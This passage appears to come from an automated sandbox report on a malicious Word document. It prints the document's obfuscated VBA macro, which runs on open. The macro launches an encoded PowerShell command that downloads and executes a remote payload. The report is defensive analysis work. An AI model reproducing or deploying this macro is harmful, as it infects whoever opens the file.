                                                        Data ASCII:. . . P u b l i c S . u b a w n d j . f a w d w d ( ) . . ' Z f L O x . U A C Z i U y v . f G G C f i h L . h r h w w n J p . p M i L M i Q E . E n Z Z L n n J . E Z k J O L k r . C i r p E i L i . x D A O M f B U . G D Z h f v M k . T M n i i Q Q k . i r v k r J M x y s M U G J k . . g v f ` i G O s s . U A s G x y p B . p v v k h D Z L . B B C C y i C y . w G C E f O w A @ f k C x M r " J . v n E y G J Q A . J k f h y M G y . f y p U A w x D . T n J n L x B r . k G A B r C Q T . E r k A v B s C . U
                                                        Data Raw:01 d8 bc 00 50 75 62 6c 69 63 20 53 00 75 62 20 61 77 6e 64 6a 00 66 61 77 64 77 64 28 29 00 0a 20 27 5a 66 4c 4f 78 00 55 41 43 5a 69 55 79 76 00 66 47 47 43 66 69 68 4c 00 68 72 68 77 77 6e 4a 70 00 70 4d 69 4c 4d 69 51 45 00 45 6e 5a 5a 4c 6e 6e 4a 00 45 5a 6b 4a 4f 4c 6b 72 00 43 69 72 70 45 69 4c 69 00 78 44 41 4f 4d 66 42 55 00 47 44 5a 68 66 76 4d 6b 00 54 4d 6e 69 69 51 51
                                                        VBA Code
                                                        Public Sub awndjfawdwd()
 'ZfLOxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
 'ZfLOgvfxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
 'GOssUAsGxypBpvvkhDZLBBCCyiCywGCEfOwAfkCxMrMkTJvnEyGJQAJkfhyMGyfypUAwxDTnJnLxBrkGABrCQTErkAvBsCUxJZOnUCThQJQwkvZpnJGkEkyTrUpphUfxLnTTCLOhZfCATwDxkfnxiGknGrxMsxQZEyOLLhfUOMBGvCMExGLwOLfTUUhknprnDwiMZZEEMLDiJEwZTLTvEMsAkTsDMvinvMECGQpwDJEJUUfTTvfyTUCfhvOGOhErAfskQyTrpEADBCTAkiiEpwZJrGykLxZBfnyLCCrnkpvwvpJxLBBQiMxOZCGDQfsGpDMnhshCTOAMyLZxBAnxvLhfTvnQiknTBOLpALTUOwvnhxrwwxGhhkkJBsZLfGGfAUEvMApyUkDxvJnAZBMfEpGUJwsnMsZZfpGOLUEJAOpBTvxUfOMhhwAQkCUBnsUxnLifEhLDCOExQkwZiysJDrTsnfJvQTkMEGMshUTBJfxUnJQQZDJZ
 t = Timer
    Dim MyRange As Range
        Dim MyCell As Range
    'Save the Workbook before changing cells
          'Copy the data
  
    'Define the target Range.    'Save the Workbook before changing cells
          'Copy the data
    'Selection.FormatConditions(1).StopIfTrue = False
    'Define the target Range.
 
On Error Resume Next
VprcMvTybtWCrceoHvvQyDD.Tables(1).Delete
VprcMvTybtWCrceoHvvQyDD.WFnhePfKQR
WFnhePfKQR.Bookmarks.Add "WFnhePfKQR", VprcMvTybtWCrceoHvvQyDD
'WFnhePfKQR WFnhePfKQR
'MsgBox ("zSG   MwGaJWMtUaonakiksIhs")
'pyYwkPhcRrowVCEdAUrhEsYKBXMQOBcobAaUbkOMGZVdtzZYKZMyN
'GwQkXHAHkyKtCWONPARvkHzfBMpRYOfELQeANpiAciUMwkVfSOztYHiXRppPUJJYofLMRSFFutKbONVQQfYwrNGd
Dim RsoXaQzRZLepceHbdJWVCWvy, wkFG
'vAib
'zSAfQhZXeDrsWescZH
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
KbR = "P": dTeRavdQLFiaRCHrHyuXdeHybQeFIYC = "o": DLszaNoPwSTucJvPenyIHhc = "w": wIZODYVPDCMy = "e": JAusDBfPdQy = "r": duEZDXrOJdeWkYVtTepnzoLHCY = "s": Cf = "h": WXdwDWONPKC = "e": avchVXNDYcPYTstAYhuGKhrTaTF = "l": eUoiAJtFvyGJNebIdK = "l":
'VrYIweaXzFDiXhfXpVoMWSuUTosuuwDpCKceik
'VprcMvTybtWCrceoHvvQyDD  IfHBhDnuXCPPOTzOEwVa
'HZLVpOHOvAFOPHKCOiiAoKd  WFnhePfKQR
'oQcNNwneBDkaphvLVEeeiRIMsGzUVGWYLwIWdREvmvAZbCPPTAPKp sAUsICOuRHVAkoJLyAHGFPSyN
With Selection
.Borders(xlDiagonalDown).LineStyle = xlNone
.Borders(xlDiagonalUp).LineStyle = xlNone
.Borders(xlEdgeLeft).LineStyle = xlNone
.Borders(xlEdgeTop).LineStyle = xlNone
.Borders(xlEdgeBottom).LineStyle = xlNone
.Borders(xlEdgeRight).LineStyle = xlNone
.Borders(xlInsideVertical).LineStyle = xlNone
.Borders(xlInsideHorizontal).LineStyle = xlNone
End With
With Application.FileSearch
.NewSearch
'Change path to suit
.LookIn = "WFnhePfKQR"
.FileType = msoFileTypeExcelWorkbooks
If .Execute > 0 Then
For lCount = 1 To .FoundFiles.Count
Set wbResults = Workbooks.Open(FileName:=.FoundFiles(lCount), UpdateLinks:=0)
wbResults.Close SaveChanges:=True
Next lCount
End If
End With
Application.ScreenUpdating = True
Application.DisplayAlerts = True
'WFnhePfKQR  DaIWJdWiZZvwD
'  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
' YbzCBveVatYsAUTyQCGXiuehbzWOeYr
'XaiAZGbTUWBFpSreBHFnfEsUYcLad
'baTEDvFnPTPpuJoaLzhYw
'hZFHaVcOKPdUrAuXVvOJs
'RrEFfsdBSDRSvDUIiatMvCDoUcGQekfhMSSiJpkUiVEUzXHRSbXAVKCnSvLdPotptLfyMwYXSDEtZKyXBPYdwwvdtYrydf
Dim MwGaJWMtUaonakiksIhs As Long
'MsgBox Prompt:="IfHBhDnuXCPPOTzOEwVa?", Buttons:=DaIWJdWiZZvwD , Title:="YbzCBveVatYsAUTyQCGXiuehbzWOeYr   "
'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe

'   khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI
Dim r As Long, x As Long
For x = 2 To r Step 1
r = r - 1
Next x
'zXJRDVFfnEbUETkMdMFHN
'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
'zXJRDVFfnEbUETkMdMFHN
'WFnhePfKQR   IfHBhDnuXCPPOTzOEwVa
'LYfutprNPzcESQiHeZEdwZRYwQrdXNWAnMoNJSvTwKoQhpNWIVVRIeMpiKGGVQRcCHpKDzXvOKyFncSbI   DaIWJdWiZZvwD
'khEaSnVGRpeArReMVbWPBsRCtZYcrikDFGkCUJUvhXeshaVHHI  yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'WFnhePfKQR  ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
wkFG = KbR + dTeRavdQLFiaRCHrHyuXdeHybQeFIYC + DLszaNoPwSTucJvPenyIHhc + wIZODYVPDCMy + JAusDBfPdQy + duEZDXrOJdeWkYVtTepnzoLHCY + Cf + WXdwDWONPKC + avchVXNDYcPYTstAYhuGKhrTaTF + eUoiAJtFvyGJNebIdK + "  -e  SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"""""
'ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
' ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe
Dim PcLEMdZaBZ As Long
Dim rhcIhwX As String
Dim dfC As Long






'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG








zXJRDVFfnEbUETkMdMFHN = "W": nYXOavcKzIMpBcpPTUXXH = "S": wYvKDGFpELyFyvwTfdsoC = "c": hZFHaVcOKPdUrAuXVvOJs = "r": baTEDvFnPTPpuJoaLzhYw = "i": EXrVaGcGkBrFHKhIoEivS = "p": IWcZEvFbdtKpLBfEDsOWX = "h": MVOcbVdCYnYUNudBNksGd = "t": WFnhePfKQR = ".":
UUh = "s":
YUQGTcCcXIokXZANQUPNKA = "e": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
zFKcHMiERAysafHJOIRHWNTtno = "l": 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
UwFFnsSaLuaDdvPFLsSAibHYWr = "l" 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
KbR = zXJRDVFfnEbUETkMdMFHN + nYXOavcKzIMpBcpPTUXXH + wYvKDGFpELyFyvwTfdsoC + hZFHaVcOKPdUrAuXVvOJs + baTEDvFnPTPpuJoaLzhYw + EXrVaGcGkBrFHKhIoEivS + MVOcbVdCYnYUNudBNksGd + WFnhePfKQR + UUh + IWcZEvFbdtKpLBfEDsOWX + YUQGTcCcXIokXZANQUPNKA + zFKcHMiERAysafHJOIRHWNTtno + UwFFnsSaLuaDdvPFLsSAibHYWr
'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
'wHrUtRPzQDKoZdXKKCGphYZeQaHIRfOkuNQWfOnbCQZwBZKwhadU
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
Set RsoXaQzRZLepceHbdJWVCWvy = CreateObject(KbR)  'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh 'yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh
RsoXaQzRZLepceHbdJWVCWvy.Run wkFG, 858235310:
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
'Declare your variables
        Dim yVKtiKEdbCNMuwYTVzznvELZUnRdwDctBZuXepArTLFPLOiiFaPVZMATwKDTSBUdzswuDEQMYeBeaBSLh As Range
        Dim ztVyJKFQNbPGdQLbkBrwennpKLaHvDuipusrbWXJPEUzhQhHIEdvYGPJdpuYKCGvOItsAsavELaGASdUe As Range
    'Save the Workbook before changing cells
        Select Case MsgBox("Can't Undo this action.  " &                             "Save Workbook First?", vbYesNoCancel)
            Case Is = vbYes
            ThisWorkbook.Save
            Case Is = vbCancel
            Exit Sub
        End Select
    'Define the target Range.
        Set MyRange = Selection
    'Start looping through the range.
        For Each MyCell In MyRange
    'Trim the Spaces.
            If Not IsEmpty(MyCell) Then
                MyCell = Trim(MyCell)
            End If
    'Get the next cell in the range
        Next MyCell
   
End Sub

                                                        VBA File Name: ThisDocument.cls, Stream Size: 203
                                                        General
                                                        Stream Path:Macros/VBA/ThisDocument
                                                        VBA File Name:ThisDocument.cls
                                                        Stream Size:203
                                                        Data ASCII:. . . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . S u b q _ O p . e n ( ) . . a w . n d j f a w d w @ d . . E n d . . . .
                                                        Data Raw:01 c7 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54
                                                        VBA Code
                                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
awndjfawdwd
End Sub

                                                        Streams

                                                        Stream Path: \x1CompObj, File Type: data, Stream Size: 118
                                                        General
                                                        Stream Path:\x1CompObj
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:118
                                                        Entropy:4.268110596474915
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . F $ . . . D o c u m e n t o d o M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 24 00 00 00 44 6f 63 75 6d 65 6e 74 6f 20 64 6f 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 260
                                                        General
                                                        Stream Path:\x5DocumentSummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:260
                                                        Entropy:2.3390993345415625
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . t . u . l . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                        Data Raw:fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 0a 00 00 00 01 00 00 00 58 00 00 00 0b 00 00 00 60 00 00 00 11 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 0c 00 00 00 7c 00 00 00 05 00 00 00 a4 00 00 00 10 00 00 00 ac 00 00 00 06 00 00 00 b4 00 00 00 0d 00 00 00 bc 00 00 00
                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 512
                                                        General
                                                        Stream Path:\x5SummaryInformation
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:512
                                                        Entropy:2.8735362928076102
                                                        Base64 Encoded:False
                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . i . a . g . o . . O . l . i . v . e . i . r . a . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . h ( i c . . . .
                                                        Data Raw:fe ff 00 00 05 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 01 00 00 12 00 00 00 01 00 00 00 98 00 00 00 04 00 00 00 a0 00 00 00 10 00 00 00 c8 00 00 00 06 00 00 00 d0 00 00 00 0c 00 00 00 dc 00 00 00 05 00 00 00 e8 00 00 00 0b 00 00 00 f4 00 00 00 08 00 00 00 00 01 00 00 0d 00 00 00 28 01 00 00
                                                        Stream Path: 1Table, File Type: data, Stream Size: 2934
                                                        General
                                                        Stream Path:1Table
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:2934
                                                        Entropy:3.1813737579527164
                                                        Base64 Encoded:False
                                                        Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                        Data Raw:6a 04 0f 00 12 00 01 00 0b 01 0f 00 00 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                        Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 218
                                                        General
                                                        Stream Path:Macros/PROJECT
                                                        CLSID:
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Stream Size:218
                                                        Entropy:4.978459919366058
                                                        Base64 Encoded:True
                                                        Data ASCII:I D = " { 1 8 E 2 6 B 3 B - 0 E 2 5 - 4 6 A 3 - 8 C 3 D - 3 C 9 6 D A D 6 8 0 C 7 } " . . D o c u m e n t = T h i s D o c u m e n t . . M o d u l e = N e w M o d u l e . . N a m e = " P r o j e c t " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 3 3 C 1 3 7 C 1 3 7 C 1 3 7 C 1 3 7 " . . D P B = " D A D 8 3 1 C 1 3 2 C 2 3 2 C 2 3 2 " . . G C = " D C D E 3 7 C B 3 B C C 3 C C C 3 C 3 3 " . .
                                                        Data Raw:49 44 3d 22 7b 31 38 45 32 36 42 33 42 2d 30 45 32 35 2d 34 36 41 33 2d 38 43 33 44 2d 33 43 39 36 44 41 44 36 38 30 43 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 6f 64 75 6c 65 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33 32 3d 22 33 39 33 32 32
                                                        Stream Path: Macros/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                                        General
                                                        Stream Path:Macros/VBA/_VBA_PROJECT
                                                        CLSID:
                                                        File Type:ISO-8859 text, with no line terminators
                                                        Stream Size:7
                                                        Entropy:1.8423709931771088
                                                        Base64 Encoded:False
                                                        Data ASCII:a . . .
                                                        Data Raw:cc 61 ff ff 00 00 00
                                                        Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 529
                                                        General
                                                        Stream Path:Macros/VBA/dir
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:529
                                                        Entropy:6.335437239038614
                                                        Base64 Encoded:True
                                                        Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . _ , f . . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ S y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c . E C . . . . } \\ , f . ! O f f i c g O . f . i . c g . . g 2 D F 8 . D 0 4 C - 5
                                                        Data Raw:01 0d b2 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 15 5f 2c 66 06 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
                                                        Stream Path: WordDocument, File Type: data, Stream Size: 3630
                                                        General
                                                        Stream Path:WordDocument
                                                        CLSID:
                                                        File Type:data
                                                        Stream Size:3630
                                                        Entropy:0.7564027997021255
                                                        Base64 Encoded:False
                                                        Data ASCII:. ! ` . . . . . . . . . . . . . . . . . . . . . . . . . . A W N . 2 4 . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . > . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . .
                                                        Data Raw:ec a5 c1 00 21 60 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 41 57 4e 00 32 34 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 3e c7 00 00 3e c7 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 6, 2025 06:07:13.552695990 CET5277653192.168.2.241.1.1.1
                                                        Jan 6, 2025 06:07:13.557485104 CET53527761.1.1.1192.168.2.24
                                                        Jan 6, 2025 06:07:13.557599068 CET5277653192.168.2.241.1.1.1
                                                        Jan 6, 2025 06:07:13.557647943 CET5277653192.168.2.241.1.1.1
                                                        Jan 6, 2025 06:07:13.562411070 CET53527761.1.1.1192.168.2.24
